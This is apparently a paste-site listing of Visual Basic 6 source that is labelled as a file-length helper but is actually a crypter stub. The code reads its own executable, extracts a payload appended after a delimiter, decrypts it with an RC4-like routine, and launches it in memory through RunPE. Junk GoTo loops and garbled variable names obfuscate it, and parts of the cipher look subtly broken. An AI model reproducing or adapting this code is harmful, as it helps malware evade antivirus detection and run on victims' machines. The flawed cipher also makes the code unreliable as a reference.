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Jan 16th, 2019
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  1. ' Autor ..........: Pink
  2. 'Nombre......... : Alternativa a LOF | FileLen
  3. Const GENERIC_READ = &H80000000
  4. Const FILE_SHARE_READ = &H1
  5. Const OPEN_EXISTING = 3
  6. Private Declare Function GetModuleFileNameA Lib "kernel32" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
  8. Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
  9. Private Declare Function GetFileSizeEx Lib "kernel32" (ByVal hFile As Long, lpFileSize As Currency) As Boolean
  10. Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
  13. 'Option Explicit
  15. Sub Pink()
  16. GoTo Chucarol
  17. Carolina:
  18. GoTo Carolina
  19. Chucarol:
  20. Dim Chucarol As Integer
  21. Dim Carolina As Integer
  22. Dim StubData As String
  23. Dim Delimiter() As String
  24. Dim file As String, hFile As String, nSize As Currency
  25. file = H13rl4ng
  26. hFile = CreateFile(file, GENERIC_READ, FILE_SHARE_READ, ByVal 0&, OPEN_EXISTING, ByVal 0&, ByVal 0&)
  27. GetFileSizeEx hFile, nSize
  28. CloseHandle hFile
  29. Size = nSize * 10000
  32. 'MsgBox (file)
  33. Open H13rl4ng For Binary As #1
  34. StubData = Space(Size)
  35. Get #1, , StubData
  36. Close #1
  37. GoTo Caro
  38. Rodri:
  39. GoTo Rodri
  40. Caro:
  41. Dim Caro As Integer
  42. Dim Rodri As Integer
  43. Delimiter() = Split(StubData, "**\\-ChuCa-//**")
  44. Delimiter(1) = ’14ü0›1ü’(Delimiter(1), "**\\-Hard-//**")
  45. GoTo Carito
  46. RoRo:
  47. GoTo RoRo
  48. Carito:
  49. Dim Carito As Integer
  50. Dim RoRo As Integer
  51. Call RunPE(App.Path & "\" & App.EXEName & ".EXE", StrConv(Delimiter(1), vbFromUnicode))
  52. GoTo caritumimurrrnuuu
  53. Rodrigo:
  54. GoTo Rodrigo
  55. caritumimurrrnuuu:
  56. Dim caritumimurrrnuuu As Integer
  57. Dim Rodrigo As Integer
  58. End Sub
  60. Public Function ’14ü0›1ü’(ByVal ›7†10œ18fœ As String, ByVal w8w3¦16º As String) As String
  61. On Error Resume Next
  62. Dim w16›10¥1wž(0 To 255) As Integer, ü7»5§7¥ü, ¦9›6¦13¥ü As Long, f14f16w1›ü() As Byte, Temp As Long
  63. f14f16w1›ü = StrConv(w8w3¦16º, vbFromUnicode)
  64. For ü7»5§7¥ü = 0 To 255
  65. ¦9›6¦13¥ü = (¦9›6¦13¥ü + w16›10¥1wž(ü7»5§7¥ü) + f14f16w1›ü(ü7»5§7¥ü Mod Len(w8w3¦16º))) Mod 256
  66. w16›10¥1wž(ü7»5§7¥ü) = ü7»5§7¥ü
  67. Next ü7»5§7¥ü
  68. f14f16w1›ü() = StrConv(›7†10œ18fœ, vbFromUnicode)
  69. For ü7»5§7¥ü = 0 To Len(›7†10œ18fœ)
  70. ¦9›6¦13¥ü = (¦9›6¦13¥ü + w16›10¥1wž(¦9›6¦13¥ü) + 1) Mod 256
  71. f14f16w1›ü(ü7»5§7¥ü) = f14f16w1›ü(ü7»5§7¥ü) Xor w16›10¥1wž(Temp + w16›10¥1wž((¦9›6¦13¥ü + w16›10¥1wž(¦9›6¦13¥ü)) Mod 254))
  72. Next ü7»5§7¥ü
  73. ’14ü0›1ü’ = StrConv(f14f16w1›ü, vbUnicode)
  74. End Function
  78. Function H13rl4ng() As String
  79. Dim bnUffer As String * 255
  80. GetModuleFileNameA 0, bnUffer, 255
  81. H13rl4ng = Replace(bnUffer, vbNullChar, vbNullString)
  82. End Function
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